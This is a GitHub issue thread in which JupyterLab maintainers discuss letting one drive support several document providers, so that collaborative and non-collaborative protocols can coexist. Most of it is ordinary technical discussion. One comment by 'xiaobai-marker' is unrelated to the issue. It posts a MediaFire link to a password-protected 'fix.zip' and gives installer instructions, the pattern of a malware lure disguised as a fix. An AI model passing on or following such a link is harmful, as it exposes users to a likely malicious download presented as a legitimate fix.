### ISSUE TITLE
Allow a drive to support multiple document providers

### ISSUE THREAD

**Issue by davidbrochart** [jupyterlab/jupyterlab#16717]
### Problem

Currently, file contents can be loaded at the drive level. For instance, the default drive allows loading files using the Jupyter Server REST API. Jupyter Collaboration swaps the default drive with its own custom drive, so that it can use another protocol than the REST API (the Y protocol over WebSocket). But this is not ideal: what if one wants to use multiple protocols within the same drive? For instance, open this notebook in collaborative mode, and that huge binary file in non-collaborative mode. For the later, we could imagine a special protocol that would not load the whole file in memory, but only a part of it.

### Proposed Solution

It seems that another abstraction would be useful, maybe `docprovider`? One would register a `docprovider` for the REST API (the default), for the RTC API, etc. Each provider would advertise the type of files it is able to handle (maybe with a "rank" saying how well it is suited for this type of files), and the drive would then choose the best `docprovider` for opening a file. If several doc providers are equally able to open a file, the UI would ask the user which one they wish to use.

### Additional context

This would fix the issue with the `RTC:` prefix of Jupyter Collaboration's custom drive, since it wouldn't need a custom drive anymore. Instead, it would register its custom `docprovider`, that could be used in the default drive.

This idea was discussed with @SylvainCorlay, @afshin, @andrii-i and @3coins.

**Comment by xiaobai-marker** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by davidbrochart** [comment]
I think they are quite orthogonal, apart from allowing to get rid of the `RTC:` prefix in `jupyter-collaboration`, but that's a side-effect.

**Comment by SylvainCorlay** [comment]
I think this is really important. We had to provide a completely separate IDrive implementation for RTC, which delegating to another protocol for certain file types is a very generic need.

Examples: 
 - an hdf5 file viewer, that would use a specialised server extension for lazily loading the content in the viewer.
 - a shared document, in which everything goes through a YJS room.

**Comment by krassowski** [comment]
@SylvainCorlay any thoughts on https://github.com/jupyterlab/jupyterlab/pull/16744#issuecomment-2538624810 and https://github.com/jupyterlab/jupyterlab/pull/16744#issuecomment-2536520203?
